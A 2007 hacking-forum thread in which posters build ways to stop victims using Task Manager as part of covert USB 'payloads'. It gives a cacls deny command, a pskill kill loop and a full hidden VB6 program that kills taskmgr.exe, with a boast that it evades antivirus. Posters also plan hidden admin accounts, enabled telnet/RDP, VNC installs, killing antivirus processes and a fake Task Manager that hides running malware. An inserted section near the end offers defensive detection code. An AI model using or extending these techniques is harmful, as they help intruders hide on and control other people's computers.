G-Stress Posted December 30, 2007
Has anyone thought of, or implemented a method to disable Ctrl alt del or taskmgr? I figured out an easy way to disable it and thought about trying to re-map the ctrl alt del keys to something else... just an idea
Sparda Posted December 30, 2007
It can be done easily in the registry... If someone can be bothered looking up how to do it. Except this is a dead giveaway that someone's computer is infected.
G-Stress Posted December 30, 2007 (Author)
True, but I didn't use the registry. That was the supposedly simplest way of disabling it, but the so-called registry entries weren't even in my registry and I didn't try to create them. I used cacls to disable it from the current logged on user. Trying to figure out now how to disable it for only maybe 30 seconds or so.
SomeoneE1se Posted December 30, 2007
rename taskmgr.exe
digip Posted December 30, 2007
> rename taskmgr.exe
Like Explorer.exe, it will put a new copy out there (or at least it should) from dll cache files or backups. You have to be logged on in safe mode, rename the file in dll cache (that it pulls a backup from) and then rename the file. I used this method to update a file so I can make my own themes that wouldn't run under the original uxtheme dll file. All system files should automatically replace themselves, and if they don't you can use something like system file checker to get it back. http://en.wikipedia.org/wiki/System_File_Checker
G-Stress Posted December 30, 2007 (Author)
Yea I've read about renaming and deleting the file and that it will create a backup upon next reboot or so. I'm just disabling it for about 30 seconds or so. I used:
    cacls c:\windows\system32\taskmgr.exe /D %COMPUTERNAME%\%USERNAME%
which seems to work just fine for now. I just am trying to figure out how to re-enable it again but after 30 seconds exactly.
    cacls c:\windows\system32\taskmgr.exe /g %COMPUTERNAME%\%USERNAME%:r
re-enables it to the current logged on user with read only access which is fine. I just want that command to execute exactly 30 seconds after it has been disabled. The only way I can think of is to ping the localhost and try to do it for only 30 seconds somehow.
SomeoneE1se Posted December 30, 2007
call sleep.bat from the file
    flashDrive:\files\sleep.exe 30
    fix.reg
G-Stress Posted December 30, 2007 (Author)
@ SomeoneElse, Where are you getting sleep.exe from?
G-Stress Posted December 30, 2007 (Author)
Never mind, I found it in the w2k Resource Kit, I thought I'd seen something like this before. Thanks, but what exactly is fix.reg?
SomeoneE1se Posted December 30, 2007
it's a .reg fix that will change what you did; just replace it with however you want to fix the changes
G-Stress Posted December 30, 2007 (Author)
oh so basically you were just using fix.reg as an example? It's not a real file? sleep.exe doesn't seem to do anything besides pause for a period of time which is exactly what I wanted, I did however create an antidote.
sablefoxx Posted December 30, 2007
also in gpedit.msc
SomeoneE1se Posted December 30, 2007
> oh so basically you were just using fix.reg as an example? It's not a real file? sleep.exe doesn't seem to do anything besides pause for a period of time which is exactly what I wanted, I did however create an antidote.
it doesn't....
G-Stress Posted December 30, 2007 (Author)
@ sablefoxx, Yea I knew I could disable it in gpedit, just didn't know how to implement that in a batch.
Xqtftqx Posted December 30, 2007
This would be a great addon to xqtftqx payload, don't ya think sablefoxx? if you can send me a batch file to disable it
remkow Posted December 30, 2007
I don't see why you would want to disable taskmanager... If the user actually tries to use it, and it doesn't work, they will immediately know something's wrong.
excid3 Posted December 30, 2007
Depends on the user... I know for one thing my parents would have no idea how to fix it and are too afraid to modify the registry for fear of breaking Windows. It would be a great little addition you could add for those not-so-experienced Windows users. Renaming the executable would really mess with them too. Can't hurt to add it to the payload, like everything else, you can enable/disable it at your own liking. Personally I think it would be fun. Ya it's kind of obvious, but that will just make them wonder who/how that got disabled. I love playing pranks with the hacksaw 8-) Friend of mine reinstalled Windows last week because I VNCed into his comp and started messing with him. He freaked. I'm gonna go disable Ctrl-Alt-Delete on him now... he's not techy enough to figure that one out. hehe...
digip Posted December 30, 2007
Better would be a Task Manager clone that hides your programs from showing up in it, or making a registry file that points to your version of a Taskmanager.exe on a thumb drive that hides your programs from being seen and then reverts back at the end of your payload to the original Taskmanager on exit. This way they can still use Task Manager to end certain programs but yours never show up in Taskmanager. If I remember correctly, there are some Taskmanager clones on PSC in VB6, so all you need to do is make the GUI look identical to the system you're on and you're pretty much golden. Make several variants to match the OS, like one for XP, 2000, Server 2003, etc. They all look similar anyway so some people might not even notice. And since it's not a virus, it shouldn't set off any alerts, although ZoneAlarm seems to ask to allow EVERY program to run if it is set up properly. It will be defeated if someone checks msinfo32.exe because they can see running tasks in there as well. But then again, you could do the same thing here and make a clone that filters out your running payloads.
G-Stress Posted December 30, 2007 (Author)
@ remkow, Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.
@ digip, I'm liking that idea a lot :) actually I had something similar in mind that would be a 3 step process. It would start out maybe just enabling telnet, rdp and creating a hidden admin user. Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc. Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.
digip Posted December 30, 2007
> @ remkow, Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.
> @ digip, I'm liking that idea a lot :) actually I had something similar in mind that would be a 3 step process. It would start out maybe just enabling telnet, rdp and creating a hidden admin user. Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc. Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.
You will have to put hooks in there to check for getting taskmanager from other places too though. Like right clicking the taskbar or "start/run/taskmgr"
G-Stress Posted December 30, 2007 (Author)
@ digip, yea that's exactly why I said if taskmgr.exe is attempted to run at all that specific process then execute step 3, hooks are you referring to ( )? Sorry I'm still a newbie at batch :?
sc0rpi0 Posted December 31, 2007
My method is kind of ghetto, but it works well. Make a batch file like this with pskill. Have it launched using nircmd with this command:
    nircmd execmd [batch file name]

    :begin
    pskill -t "TASKMGR.EXE"
    :goto begin
digip Posted December 31, 2007
Here is a little vb6 app that when run, hides it off screen and captures the delete key as well as mouse movements, so if they right click the taskbar to start taskmgr or use start/run or even windowskey+R to load a run box and manually run taskmgr, it kills taskmgr from running. Press F12 and it unloads the program, or add another timer and kill the vb6 program after so many minutes.

    'End Taskmgr in Windows XP
    '12/31/2007 - DigiP
    '
    'Following Line allows ShellExecute commands
    Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

    'Mouse Detection Src Code: http://www.daniweb.com/forums/thread101100.html
    Private Type POINTAPI
        X As Long
        Y As Long
    End Type

    Private Declare Function GetCursorPos Lib "User32" (lpPoint As POINTAPI) As Long

    Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer)
        On Error GoTo poo
        If KeyCode = vbKeyDelete Then 'Because we only want to check if delete is pressed in combo with ctrl+alt+del
            MakeNotTopMost (Me.hWnd)
            ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
        End If
        MakeTopMost (Me.hWnd)
        'Change this to whatever you want!
        If KeyCode = vbKeyF12 Then Unload Me
        Exit Sub
    poo:
        MakeTopMost (Me.hWnd)
        Exit Sub
    End Sub

    Private Sub Timer1_Timer()
        Dim Point As POINTAPI
        Dim lngReturn As Long
        Dim lngScreenX As Long
        Dim lngScreenY As Long
        lngReturn = GetCursorPos(Point)
        lngScreenX = Point.X
        lngScreenY = Point.Y
        ' Enter Code to whatever you want with the results '
        'Debug.Print "X-pos: " & lngScreenX & " , Y-pos: " & lngScreenY
        On Error GoTo poo
        MakeNotTopMost (Me.hWnd)
        ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
        MakeTopMost (Me.hWnd)
        Exit Sub
    poo:
        MakeTopMost (Me.hWnd)
        Exit Sub
    End Sub

Create a form and add timer to it (Set the interval to like 2000 which is 2 seconds or 1000 for 1 second). Then resize the form to like 10x10 pixels and make its start up position off screen. Done. Full source project download as well as working EXE file: http://www.twistedpairrecords.com/digip/ctrled.rar
And BTW, virus scanners do not detect it since it really isn't malicious code, just built in Windows functions. Will not work on anything older than xp since taskmgr is not a program on 98 or 95 and taskkill is an XP system program. This can still be detected and defeated by opening cmd.exe and typing in tasklist to see what's running. Then killing it with:
    taskkill /F /IM ctrled.exe
I leave it up to you if you also want to kill cmd.exe or command.com, but leave yourself a way to end it safely or it will run forever until you reboot.
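Added example, not part of the thread or any poster's code: both techniques discussed above (the cacls deny entry on taskmgr.exe from G-Stress's post, and the repeated pskill/taskkill of taskmgr.exe from sc0rpi0's and digip's posts) leave process-creation command lines that a defender can match. The event tuples, host names and the 3-kills-in-10-seconds threshold are constructed assumptions, and the icacls `/deny` form is included as a generalization beyond the thread.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records (time, host, command line), in the shape
# a parsed Sysmon Event ID 1 or Security 4688 export would have.
SAMPLE_EVENTS = [
    ("2007-12-31 10:00:01", "PC1", r"cacls c:\windows\system32\taskmgr.exe /D PC1\alice"),
    ("2007-12-31 10:00:31", "PC1", r"cacls c:\windows\system32\taskmgr.exe /g PC1\alice:r"),
    ("2007-12-31 10:05:00", "PC2", r'pskill -t "TASKMGR.EXE"'),
    ("2007-12-31 10:05:01", "PC2", r'pskill -t "TASKMGR.EXE"'),
    ("2007-12-31 10:05:02", "PC2", r"TASKKILL /F /IM taskmgr.exe"),
    ("2007-12-31 10:07:00", "PC3", r"taskkill /F /IM notepad.exe"),
    ("2007-12-31 10:08:00", "PC3", r"cacls c:\data\report.doc /D PC3\bob"),
]

TARGET = re.compile(r"\btaskmgr\.exe\b", re.I)
ACL_TOOL = re.compile(r"^\s*\"?(?:\S*\\)?i?cacls(?:\.exe)?\b", re.I)
ACL_DENY = re.compile(r"\s/(?:d|deny)\b", re.I)
KILL_TOOL = re.compile(r"^\s*\"?(?:\S*\\)?(?:pskill|taskkill)(?:\.exe)?\b", re.I)


def detect(events, window=timedelta(seconds=10), threshold=3):
    """Return sorted (host, finding) pairs for Task Manager tampering."""
    findings = set()
    kills = defaultdict(list)
    for ts, host, cmd in events:
        if not TARGET.search(cmd):
            continue  # only command lines that name taskmgr.exe matter here
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if ACL_TOOL.search(cmd) and ACL_DENY.search(cmd):
            findings.add((host, "deny-acl-on-taskmgr"))
        elif KILL_TOOL.search(cmd):
            kills[host].append(when)
    for host, times in kills.items():
        times.sort()
        # Sliding window: 'threshold' kills inside 'window' means a kill loop,
        # not a one-off manual taskkill by an administrator.
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                findings.add((host, "taskmgr-kill-loop"))
                break
    return sorted(findings)


if __name__ == "__main__":
    for host, finding in detect(SAMPLE_EVENTS):
        print(host, finding)
```

A deny finding is worth pairing with a check of the file's current ACL on the host, since the later `/g` grant in the sample does not by itself prove the deny entry was removed.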
G-Stress Posted December 31, 2007 (Author)
@ digip, Nice one. I'll have to play around with that. Hmmm... how bout not kill cmd, but really restrict it to limited usage... actually... I wonder if there is an app cmd-like that when a user runs cmd or command.com those commands are mapped to a custom "shell" a fake shell something that would not allow the user to run admin commands, but appear as normal shell... I got quite a few ideas in mind I would like to create something not so much as to do damage, but to really make a user think.
@ Sc0rpi0, Yea I plan to use pskill to kill all existing av/spyware processes... or wouldn't it be better if instead of killing the process just stop the service temporarily ;)
digip Posted December 31, 2007
Just so you know, my vb app does not get detected by any anti virus software: http://www.virustotal.com/analisis/60fa6d1...3ba0d76237a8bd2